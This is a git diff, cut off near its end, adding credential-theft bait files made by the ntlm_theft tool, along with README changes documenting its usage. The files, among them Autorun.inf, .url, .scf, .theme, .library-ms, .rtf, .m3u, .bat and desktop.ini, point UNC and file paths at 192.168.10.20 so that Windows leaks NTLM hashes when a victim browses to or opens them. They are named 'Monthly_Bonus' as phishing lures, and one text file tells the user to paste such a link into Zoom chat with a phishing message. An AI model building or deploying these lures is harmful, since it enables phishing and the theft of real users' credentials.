diff --git a/Monthly_Bonus/Autorun.inf b/Monthly_Bonus/Autorun.inf
new file mode 100644
index 0000000..eabb8f1
--- /dev/null
+++ b/Monthly_Bonus/Autorun.inf
@@ -0,0 +1,4 @@
+[autorun]
+open=\\192.168.10.20\setup.exe
+icon=something.ico
+action=open Setup.exe
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus-(externalcell).xlsx b/Monthly_Bonus/Monthly_Bonus-(externalcell).xlsx
new file mode 100644
index 0000000..d6f5b2e
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(externalcell).xlsx differ
diff --git a/Monthly_Bonus/Monthly_Bonus-(frameset).docx b/Monthly_Bonus/Monthly_Bonus-(frameset).docx
new file mode 100644
index 0000000..d9ea1d6
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(frameset).docx differ
diff --git a/Monthly_Bonus/Monthly_Bonus-(fulldocx).xml b/Monthly_Bonus/Monthly_Bonus-(fulldocx).xml
new file mode 100644
index 0000000..c495041
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus-(fulldocx).xml
@@ -0,0 +1,916 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ntlm_theft
+
+
+ ntlm_theft
+ 1
+ 2020-03-23T01:21:00Z
+ 2020-03-23T01:24:00Z
+
+
+
+
+
+
+ Normal.dotm
+ 3
+ 1
+ 9
+ 57
+ Microsoft Office Word
+ 0
+ 1
+ 1
+ false
+
+ false
+ 65
+ false
+ false
+ 16.0000
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus-(handler).htm b/Monthly_Bonus/Monthly_Bonus-(handler).htm
new file mode 100644
index 0000000..cf306c6
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus-(handler).htm
@@ -0,0 +1,6 @@
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus-(icon).url b/Monthly_Bonus/Monthly_Bonus-(icon).url
new file mode 100644
index 0000000..51452c0
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus-(icon).url
@@ -0,0 +1,5 @@
+[InternetShortcut]
+URL=whatever
+WorkingDirectory=whatever
+IconFile=\\192.168.10.20\%USERNAME%.icon
+IconIndex=1
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus-(includepicture).docx b/Monthly_Bonus/Monthly_Bonus-(includepicture).docx
new file mode 100644
index 0000000..38a6ced
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(includepicture).docx differ
diff --git a/Monthly_Bonus/Monthly_Bonus-(remotetemplate).docx b/Monthly_Bonus/Monthly_Bonus-(remotetemplate).docx
new file mode 100644
index 0000000..bad84c9
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(remotetemplate).docx differ
diff --git a/Monthly_Bonus/Monthly_Bonus-(stylesheet).xml b/Monthly_Bonus/Monthly_Bonus-(stylesheet).xml
new file mode 100644
index 0000000..c2d8221
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus-(stylesheet).xml
@@ -0,0 +1,3 @@
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus-(url).url b/Monthly_Bonus/Monthly_Bonus-(url).url
new file mode 100644
index 0000000..8ff84aa
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus-(url).url
@@ -0,0 +1,2 @@
+[InternetShortcut]
+URL=file://192.168.10.20/leak/leak.html
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.application b/Monthly_Bonus/Monthly_Bonus.application
new file mode 100644
index 0000000..7c87de4
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.application
@@ -0,0 +1,18 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ESZ11736AFIJnp6lKpFYCgjw4dU=
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.asx b/Monthly_Bonus/Monthly_Bonus.asx
new file mode 100644
index 0000000..b9f2c8a
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.asx
@@ -0,0 +1,7 @@
+
+ Leak
+
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.bat b/Monthly_Bonus/Monthly_Bonus.bat
new file mode 100644
index 0000000..0d5432f
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.bat
@@ -0,0 +1,2 @@
+@echo off
+start "" "\\192.168.10.20\share"
diff --git a/Monthly_Bonus/Monthly_Bonus.htm b/Monthly_Bonus/Monthly_Bonus.htm
new file mode 100644
index 0000000..266013e
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.htm
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.jnlp b/Monthly_Bonus/Monthly_Bonus.jnlp
new file mode 100644
index 0000000..5e21a92
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.jnlp
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.library-ms b/Monthly_Bonus/Monthly_Bonus.library-ms
new file mode 100644
index 0000000..58b2545
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.library-ms
@@ -0,0 +1,29 @@
+
+
+@shell32.dll,-34575
+S-1-5-21-372074477-2495183225-776587326-1000
+1
+true
+\\192.168.10.20\aa
+
+{7d49d726-3c21-4f05-99aa-fdc2c9474656}
+
+
+
+@shell32.dll,-34577
+true
+
+knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
+MBAAAEAFCAAA...MFNVAAAAAA
+
+
+
+@shell32.dll,-34579
+true
+
+knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634}
+MBAAAEAFCAAA...HJIfK9AAAAAA
+
+
+
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.lnk b/Monthly_Bonus/Monthly_Bonus.lnk
new file mode 100644
index 0000000..0426a56
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus.lnk differ
diff --git a/Monthly_Bonus/Monthly_Bonus.m3u b/Monthly_Bonus/Monthly_Bonus.m3u
new file mode 100644
index 0000000..ca03449
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.m3u
@@ -0,0 +1,3 @@
+#EXTM3U
+#EXTINF:1337, Leak
+\\192.168.10.20\leak.mp3
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.odt b/Monthly_Bonus/Monthly_Bonus.odt
new file mode 100644
index 0000000..af928a8
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus.odt differ
diff --git a/Monthly_Bonus/Monthly_Bonus.pdf b/Monthly_Bonus/Monthly_Bonus.pdf
new file mode 100644
index 0000000..808eca5
Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus.pdf differ
diff --git a/Monthly_Bonus/Monthly_Bonus.rtf b/Monthly_Bonus/Monthly_Bonus.rtf
new file mode 100644
index 0000000..1830afe
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.rtf
@@ -0,0 +1 @@
+{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://192.168.10.20/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.scf b/Monthly_Bonus/Monthly_Bonus.scf
new file mode 100644
index 0000000..f33b3cb
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.scf
@@ -0,0 +1,5 @@
+[Shell]
+Command=2
+IconFile=\\192.168.10.20\tools\nc.ico
+[Taskbar]
+Command=ToggleDesktop
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.theme b/Monthly_Bonus/Monthly_Bonus.theme
new file mode 100644
index 0000000..b25c65c
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.theme
@@ -0,0 +1,66 @@
+[Theme]
+; Windows - IDS_THEME_DISPLAYNAME_AERO_LIGHT
+DisplayName=\192.168.10.20 Theme
+SetLogonBackground=0
+; Computer - SHIDI_SERVER
+[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]
+DefaultValue=\\192.168.10.20\setup.exe,-109
+
+; UsersFiles - SHIDI_USERFILES
+[CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\DefaultIcon]
+DefaultValue=\\192.168.10.20\setup.exe,-123
+
+; Network - SHIDI_MYNETWORK
+[CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\DefaultIcon]
+DefaultValue=\\192.168.10.20\setup.exe,-25
+
+; Recycle Bin - SHIDI_RECYCLERFULL SHIDI_RECYCLER
+[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]
+Full=\\192.168.10.20\setup.exe,-54
+Empty=\\192.168.10.20\setup.exe,-55
+
+[Control Panel\Cursors]
+AppStarting=\\192.168.10.20\setup.exe
+Arrow=\\192.168.10.20\aero_arrow.cur
+Crosshair=
+Hand=\\192.168.10.20\aero_link.cur
+Help=\\192.168.10.20\aero_helpsel.cur
+IBeam=
+No=\\192.168.10.20\aero_unavail.cur
+NWPen=\\192.168.10.20\aero_pen.cur
+SizeAll=\\192.168.10.20\aero_move.cur
+SizeNESW=\\192.168.10.20\aero_nesw.cur
+SizeNS=\\192.168.10.20\aero_ns.cur
+SizeNWSE=\\192.168.10.20\aero_nwse.cur
+SizeWE=\\192.168.10.20\aero_ew.cur
+UpArrow=\\192.168.10.20\aero_up.cur
+Wait=\\192.168.10.20\aero_busy.ani
+DefaultValue=Windows Default
+DefaultValue.MUI=@main.cpl,-1020
+
+[Control Panel\Desktop]
+Wallpaper=\\192.168.10.20\setup.exe
+TileWallpaper=0
+WallpaperStyle=10
+Pattern=
+MultimonBackgrounds=0
+
+[VisualStyles]
+Path=\\192.168.10.20\Themes\Aero\Aero.msstyles
+ColorStyle=NormalColor
+Size=NormalSize
+AutoColorization=0
+ColorizationColor=0XC40078D4
+SystemMode=Light
+AppMode=Light
+
+[boot]
+SCRNSAVE.EXE=
+
+[MasterThemeSelector]
+MTSM=RJSPBS
+
+[Sounds]
+; IDS_SCHEME_DEFAULT
+SchemeName=@\\192.168.10.20\setup.dll,-800
+
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.wax b/Monthly_Bonus/Monthly_Bonus.wax
new file mode 100644
index 0000000..c2e8948
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.wax
@@ -0,0 +1,2 @@
+https://192.168.10.20/test
+file://\\192.168.10.20/steal/file
\ No newline at end of file
diff --git a/Monthly_Bonus/Monthly_Bonus.website b/Monthly_Bonus/Monthly_Bonus.website
new file mode 100644
index 0000000..55762c1
--- /dev/null
+++ b/Monthly_Bonus/Monthly_Bonus.website
@@ -0,0 +1,12 @@
+[{000214A0-0000-0000-C000-000000000046}]
+Prop3=19,2
+Prop4=31,go.microsoft.com
+[InternetShortcut]
+URL=file:///192.168.10.20/
+[{A7AF692E-098D-4C08-A225-D433CA835ED0}]
+Prop5=3,0
+Prop9=19,0
+Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056
+Prop6=3,1
+[{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}]
+Prop5=8,Microsoft.Website.B4BD2547.99055A5E
\ No newline at end of file
diff --git a/Monthly_Bonus/desktop.ini b/Monthly_Bonus/desktop.ini
new file mode 100644
index 0000000..143dd6b
--- /dev/null
+++ b/Monthly_Bonus/desktop.ini
@@ -0,0 +1,2 @@
+[.ShellClassInfo]
+IconResource=\\192.168.10.20\aa
\ No newline at end of file
diff --git a/Monthly_Bonus/zoom-attack-instructions.txt b/Monthly_Bonus/zoom-attack-instructions.txt
new file mode 100644
index 0000000..4833f2e
--- /dev/null
+++ b/Monthly_Bonus/zoom-attack-instructions.txt
@@ -0,0 +1,3 @@
+To attack zoom, just put the following link along with your phishing message in the chat window:
+
+\\192.168.10.20\xyz
diff --git a/README.md b/README.md
index 7d27b3a..6ef5e35 100644
--- a/README.md
+++ b/README.md
@@ -15,6 +15,7 @@ ntlm_theft supports the following attack types:
* .scf – via ICONFILE field (Not Working on Latest Windows)
* autorun.inf via OPEN field (Not Working on Latest Windows)
* desktop.ini - via IconResource field (Not Working on Latest Windows)
+ * .bat – delivered via the URL field or execute via cmd.exe.
* Open Document
* .xml – via Microsoft Word external stylesheet
* .xml – via Microsoft Word includepicture field
@@ -28,10 +29,12 @@ ntlm_theft supports the following attack types:
* .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
* .jnlp – via Java external jar
* .application – via any Browser (Must be served via a browser downloaded or won’t run)
+ * .odt – via LibreOffice / OpenOffice
* Open Document and Accept Popup
* .pdf – via Adobe Acrobat Reader
* Click Link in Chat Program
* .txt – formatted link to paste into Zoom chat
+
## Usecases (Why you want to run this)
@@ -49,7 +52,7 @@ These instructions will show you the requirements for and how to use ntlm_theft.
ntlm_theft requires Python3 and xlsxwriter:
```
-pip3 install xlsxwriter
+pip3 install -r requirements.txt
```
### Required Parameters
@@ -67,23 +70,34 @@ To start up the tool 4 parameters must be provided, an input format, the input f
Here is an example of what a run looks like generating all files:
```
-# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
-Created: test/test.scf (BROWSE)
-Created: test/test-(url).url (BROWSE)
-Created: test/test-(icon).url (BROWSE)
-Created: test/test.rtf (OPEN)
-Created: test/test-(stylesheet).xml (OPEN)
-Created: test/test-(fulldocx).xml (OPEN)
-Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
-Created: test/test-(includepicture).docx (OPEN)
-Created: test/test-(remotetemplate).docx (OPEN)
-Created: test/test-(frameset).docx (OPEN)
-Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
-Created: test/test.asx (OPEN)
-Created: test/test.jnlp (OPEN)
-Created: test/test.application (DOWNLOAD AND OPEN)
-Created: test/test.pdf (OPEN AND ALLOW)
-Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
+# python3 ntlm_theft.py --generate all --server 192.168.10.20 --filename alienkeric
+Created: alienkeric/alienkeric.scf (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric-(url).url (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric-(icon).url (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.lnk (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.rtf (OPEN)
+Created: alienkeric/alienkeric-(stylesheet).xml (OPEN)
+Created: alienkeric/alienkeric-(fulldocx).xml (OPEN)
+Created: alienkeric/alienkeric.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
+Created: alienkeric/alienkeric-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
+Created: alienkeric/alienkeric-(includepicture).docx (OPEN)
+Created: alienkeric/alienkeric-(remotetemplate).docx (OPEN)
+Created: alienkeric/alienkeric-(frameset).docx (OPEN)
+Created: alienkeric/alienkeric-(externalcell).xlsx (OPEN)
+Created: alienkeric/alienkeric.wax (OPEN)
+Created: alienkeric/alienkeric.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
+Created: alienkeric/alienkeric.asx (OPEN)
+Created: alienkeric/alienkeric.jnlp (OPEN)
+Created: alienkeric/alienkeric.application (DOWNLOAD AND OPEN)
+Created: alienkeric/alienkeric.pdf (OPEN AND ALLOW)
+Created: alienkeric/zoom-attack-instructions.txt (PASTE TO CHAT)
+Created: alienkeric/alienkeric.library-ms (BROWSE TO FOLDER)
+Created: alienkeric/Autorun.inf (BROWSE TO FOLDER)
+Created: alienkeric/desktop.ini (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.theme (THEME TO INSTALL
+Created: alienkeric/alienkeric.bat (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.website (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.odt (Open in LibreOffice / OpenOffice)
Generation Complete.
```
@@ -93,39 +107,45 @@ Generation Complete.
Here is an example of what a run looks like generating only modern files:
```
-# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
-Skipping SCF as it does not work on modern Windows
-Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
-Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
-Created: meeting/meeting.rtf (OPEN)
-Created: meeting/meeting-(stylesheet).xml (OPEN)
-Created: meeting/meeting-(fulldocx).xml (OPEN)
-Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
-Created: meeting/meeting-(includepicture).docx (OPEN)
-Created: meeting/meeting-(remotetemplate).docx (OPEN)
-Created: meeting/meeting-(frameset).docx (OPEN)
-Created: meeting/meeting-(externalcell).xlsx (OPEN)
-Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
-Created: meeting/meeting.asx (OPEN)
-Created: meeting/meeting.jnlp (OPEN)
-Created: meeting/meeting.application (DOWNLOAD AND OPEN)
-Created: meeting/meeting.pdf (OPEN AND ALLOW)
+# python3 ntlm_theft.py --generate modern --server 192.168.10.20 --filename alienkeric
+Created: alienkeric/alienkeric-(url).url (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric-(icon).url (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.lnk (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.rtf (OPEN)
+Created: alienkeric/alienkeric-(stylesheet).xml (OPEN)
+Created: alienkeric/alienkeric-(fulldocx).xml (OPEN)
+Created: alienkeric/alienkeric.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
+Created: alienkeric/alienkeric-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
+Created: alienkeric/alienkeric-(includepicture).docx (OPEN)
+Created: alienkeric/alienkeric-(remotetemplate).docx (OPEN)
+Created: alienkeric/alienkeric-(frameset).docx (OPEN)
+Created: alienkeric/alienkeric-(externalcell).xlsx (OPEN)
+Created: alienkeric/alienkeric.wax (OPEN)
+Created: alienkeric/alienkeric.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
+Created: alienkeric/alienkeric.asx (OPEN)
+Created: alienkeric/alienkeric.jnlp (OPEN)
+Created: alienkeric/alienkeric.application (DOWNLOAD AND OPEN)
+Created: alienkeric/alienkeric.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
+Created: alienkeric/alienkeric.library-ms (BROWSE TO FOLDER)
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
+Created: alienkeric/alienkeric.theme (THEME TO INSTALL
+Created: alienkeric/alienkeric.bat (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.website (BROWSE TO FOLDER)
+Created: alienkeric/alienkeric.odt (Open in LibreOffice / OpenOffice)
Generation Complete.
```
-Here is an example of what a run looks like generating only a xlsx file:
+Here is an example of what a run looks like generating only a odt file:
```
-# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
-Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
+# python3 ntlm_theft.py --generate odt --server 192.168.10.20 --filename alienkeric
+Created: alienkeric/alienkeric.odt (Open in LibreOffice / OpenOffice)
Generation Complete.
```
## Authors
-
* **Jacob Wilkin** - *Research and Development*
## License
diff --git a/alienkeric/Autorun.inf b/alienkeric/Autorun.inf
new file mode 100644
index 0000000..eabb8f1
--- /dev/null
+++ b/alienkeric/Autorun.inf
@@ -0,0 +1,4 @@
+[autorun]
+open=\\192.168.10.20\setup.exe
+icon=something.ico
+action=open Setup.exe
\ No newline at end of file
diff --git a/alienkeric/alienkeric-(externalcell).xlsx b/alienkeric/alienkeric-(externalcell).xlsx
new file mode 100644
index 0000000..db14693
Binary files /dev/null and b/alienkeric/alienkeric-(externalcell).xlsx differ
diff --git a/alienkeric/alienkeric-(frameset).docx b/alienkeric/alienkeric-(frameset).docx
new file mode 100644
index 0000000..f5e55bc
Binary files /dev/null and b/alienkeric/alienkeric-(frameset).docx differ
diff --git a/alienkeric/alienkeric-(fulldocx).xml b/alienkeric/alienkeric-(fulldocx).xml
new file mode 100644
index 0000000..c495041
--- /dev/null
+++ b/alienkeric/alienkeric-(fulldocx).xml
@@ -0,0 +1,916 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ntlm_theft
+
+
+ ntlm_theft
+ 1
+ 2020-03-23T01:21:00Z
+ 2020-03-23T01:24:00Z
+
+
+
+
+
+
+ Normal.dotm
+ 3
+ 1
+ 9
+ 57
+ Microsoft Office Word
+ 0
+ 1
+ 1
+ false
+
+ false
+ 65
+ false
+ false
+ 16.0000
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric-(handler).htm b/alienkeric/alienkeric-(handler).htm
new file mode 100644
index 0000000..cf306c6
--- /dev/null
+++ b/alienkeric/alienkeric-(handler).htm
@@ -0,0 +1,6 @@
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric-(icon).url b/alienkeric/alienkeric-(icon).url
new file mode 100644
index 0000000..51452c0
--- /dev/null
+++ b/alienkeric/alienkeric-(icon).url
@@ -0,0 +1,5 @@
+[InternetShortcut]
+URL=whatever
+WorkingDirectory=whatever
+IconFile=\\192.168.10.20\%USERNAME%.icon
+IconIndex=1
\ No newline at end of file
diff --git a/alienkeric/alienkeric-(includepicture).docx b/alienkeric/alienkeric-(includepicture).docx
new file mode 100644
index 0000000..d5c2a6a
Binary files /dev/null and b/alienkeric/alienkeric-(includepicture).docx differ
diff --git a/alienkeric/alienkeric-(remotetemplate).docx b/alienkeric/alienkeric-(remotetemplate).docx
new file mode 100644
index 0000000..fb94650
Binary files /dev/null and b/alienkeric/alienkeric-(remotetemplate).docx differ
diff --git a/alienkeric/alienkeric-(stylesheet).xml b/alienkeric/alienkeric-(stylesheet).xml
new file mode 100644
index 0000000..c2d8221
--- /dev/null
+++ b/alienkeric/alienkeric-(stylesheet).xml
@@ -0,0 +1,3 @@
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric-(url).url b/alienkeric/alienkeric-(url).url
new file mode 100644
index 0000000..8ff84aa
--- /dev/null
+++ b/alienkeric/alienkeric-(url).url
@@ -0,0 +1,2 @@
+[InternetShortcut]
+URL=file://192.168.10.20/leak/leak.html
\ No newline at end of file
diff --git a/alienkeric/alienkeric.application b/alienkeric/alienkeric.application
new file mode 100644
index 0000000..7c87de4
--- /dev/null
+++ b/alienkeric/alienkeric.application
@@ -0,0 +1,18 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ESZ11736AFIJnp6lKpFYCgjw4dU=
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric.asx b/alienkeric/alienkeric.asx
